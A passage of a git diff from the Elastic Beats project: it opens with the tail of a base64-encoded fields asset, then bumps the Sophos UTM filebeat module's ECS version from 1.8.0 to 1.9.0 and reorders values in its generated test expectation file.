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" } diff --git a/x-pack/filebeat/module/sophos/utm/config/input.yml b/x-pack/filebeat/module/sophos/utm/config/input.yml index 0d4e59f4f42..9e7cd0d16c5 100644 --- a/x-pack/filebeat/module/sophos/utm/config/input.yml +++ b/x-pack/filebeat/module/sophos/utm/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/sophos/utm/test/generated.log-expected.json b/x-pack/filebeat/module/sophos/utm/test/generated.log-expected.json index e998e20910c..7fc70f46e97 100644 --- a/x-pack/filebeat/module/sophos/utm/test/generated.log-expected.json +++ b/x-pack/filebeat/module/sophos/utm/test/generated.log-expected.json @@ -55,13 +55,13 @@ "ercit2385.internal.home" ], "related.ip": [ - "10.47.202.102", - "10.57.170.140" + "10.57.170.140", + "10.47.202.102" ], "related.user": [ "dexeac", - "icistatuscode=giatquov", - "sunt" + "sunt", + "icistatuscode=giatquov" ], "rsa.db.index": "run", "rsa.identity.logon_type": "nofdeF", @@ -70,8 +70,8 @@ "rsa.investigations.event_cat": 1901000000, "rsa.investigations.event_cat_name": "Other.Default", "rsa.misc.action": [ - "ugiatnu", - "block" + "block", + "ugiatnu" ], "rsa.misc.comments": "colabo", "rsa.misc.content_type": "sedd", @@ -887,8 +887,8 @@ "elites4713.www.localhost" ], "related.ip": [ - "10.52.190.18", - "10.161.51.135" + "10.161.51.135", + "10.52.190.18" ], "rsa.internal.event_desc": "portscan", "rsa.internal.messageid": "ulogd", @@ -974,8 +974,8 @@ "10.232.108.32" ], "related.user": [ - "rsp", - "llum" + "llum", + "rsp" ], "rsa.identity.logon_type": "ntut", "rsa.internal.event_desc": "ittenb", @@ -1048,8 +1048,8 @@ "rsa.investigations.event_cat": 1901000000, "rsa.investigations.event_cat_name": "Other.Default", "rsa.misc.action": [ - "deny", - "iuntN" + "iuntN", + "deny" ], "rsa.misc.comments": "onorume", "rsa.misc.content_type": "lapa", @@ -1610,8 +1610,8 @@ "10.244.96.61" ], "related.user": [ - "iumt", - "itsedqui" + "itsedqui", + "iumt" ], "rsa.identity.logon_type": "psamvolu", "rsa.internal.event_desc": "orroqui", @@ -1855,8 +1855,8 @@ "10.98.126.206" ], "related.user": [ - "isnostru", "amremapstatuscode=dolorsit", + "isnostru", "hen" ], "rsa.db.index": "spernatu", @@ -1866,8 +1866,8 @@ "rsa.investigations.event_cat": 1901000000, "rsa.investigations.event_cat_name": "Other.Default", "rsa.misc.action": [ - "block", - "nsectetu" + "nsectetu", + "block" ], "rsa.misc.comments": "uaer", "rsa.misc.content_type": "eaqu", @@ -1924,8 +1924,8 @@ "observer.vendor": "Sophos", "process.pid": 6722, "related.ip": [ - "10.203.157.250", - "10.32.236.117" + "10.32.236.117", + "10.203.157.250" ], "rsa.internal.event_desc": "Packet", "rsa.internal.messageid": "ulogd", @@ -2033,9 +2033,9 @@ "10.2.24.156" ], "related.user": [ - "ulpaq", - "dolorsistatuscode=acc", "ntoccae", + "dolorsistatuscode=acc", + "ulpaq", "Sedutper" ], "rsa.db.index": "snisiut", @@ -2045,8 +2045,8 @@ "rsa.investigations.event_cat": 1901000000, "rsa.investigations.event_cat_name": "Other.Default", "rsa.misc.action": [ - "block", - "icons" + "icons", + "block" ], "rsa.misc.comments": "porincid", "rsa.misc.content_type": "temvele", @@ -2120,13 +2120,13 @@ "mni4032.lan" ], "related.ip": [ - "10.202.65.2", - "10.180.169.49" + "10.180.169.49", + "10.202.65.2" ], "related.user": [ - "tasu", + "iscivelistatuscode=urve", "atatno", - "iscivelistatuscode=urve" + "tasu" ], "rsa.db.index": "amrem", "rsa.identity.logon_type": "nulamcol", @@ -2314,13 +2314,13 @@ "obea2960.mail.corp" ], "related.ip": [ - "10.33.138.154", - "10.45.12.53" + "10.45.12.53", + "10.33.138.154" ], "related.user": [ + "porincid", "umqustatuscode=ntexpli", - "eturadip", - "porincid" + "eturadip" ], "rsa.db.index": "dolor", "rsa.identity.logon_type": "eturadi", @@ -2632,10 +2632,10 @@ "10.210.175.52" ], "related.user": [ - "rExce", "inimastatuscode=emipsum", "reetd", - "Loremi" + "Loremi", + "rExce" ], "rsa.db.index": "apa", "rsa.identity.logon_type": "sedquia", @@ -3619,8 +3619,8 @@ "10.96.200.83" ], "related.user": [ - "acommod", - "lapariat" + "lapariat", + "acommod" ], "rsa.identity.logon_type": "remeumf", "rsa.internal.event_desc": "dol", diff --git a/x-pack/filebeat/module/sophos/xg/_meta/fields.yml b/x-pack/filebeat/module/sophos/xg/_meta/fields.yml index dca81ddc4e6..b74eac567b5 100644 